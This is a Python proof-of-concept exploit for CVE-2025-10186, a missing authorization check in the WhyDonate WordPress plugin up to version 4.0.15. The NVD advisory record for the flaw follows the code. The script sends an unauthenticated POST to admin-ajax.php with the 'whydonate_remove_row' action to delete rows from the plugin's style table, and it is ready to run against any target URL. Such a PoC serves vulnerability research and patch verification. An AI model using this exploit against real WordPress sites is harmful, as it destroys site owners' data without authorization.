CVE-2025-10186

import requests # CVE-2025-10186 PoC - WhyDonate Plugin Unauthorized Row Deletion # Target: WordPress sites with WhyDonate plugin <= 4.0.15 TARGET_URL = "http://target-wordpress-site.com" # The AJAX action endpoint registered by the plugin (wp_ajax_nopriv_*) AJAX_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php" def exploit_remove_row(row_id): """ Exploit the missing capability check in remove_row function to delete rows from wp_wdplugin_style table without authentication. """ # Step 1: Prepare the malicious request payload # The action parameter targets the vulnerable AJAX handler payload = { "action": "whydonate_remove_row", # AJAX action hook name "row_id": str(row_id) # ID of the row to delete } # Step 2: Send the unauthenticated request # No authentication headers or cookies required headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } try: response = requests.post( AJAX_ENDPOINT, data=payload, headers=headers, timeout=10 ) # Step 3: Check response if response.status_code == 200: print(f"[+] Row {row_id} deletion request sent successfully") print(f"[+] Response: {response.text[:200]}") return True else: print(f"[-] Unexpected status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": # Attempt to delete row ID 1 (or any valid row ID) print("[*] CVE-2025-10186 - WhyDonate Plugin Exploit") print("[*] Attempting unauthorized row deletion...") exploit_remove_row(row_id=1)

{"cve": {"id": "CVE-2025-10186", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:38.467", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WhyDonate – FREE Donate button – Crowdfunding – Fundraising plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the remove_row function in all versions up to, and including, 4.0.15. This makes it possible for unauthenticated attackers to delete rows from the wp_wdplugin_style table."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3378787%40wp-whydonate&new=3378787%40wp-whydonate&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/wp-whydonate/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3c6f30bb-dec0-4776-b255-bb88c9d003c2?source=cve", "source": "[email protected]"}]}}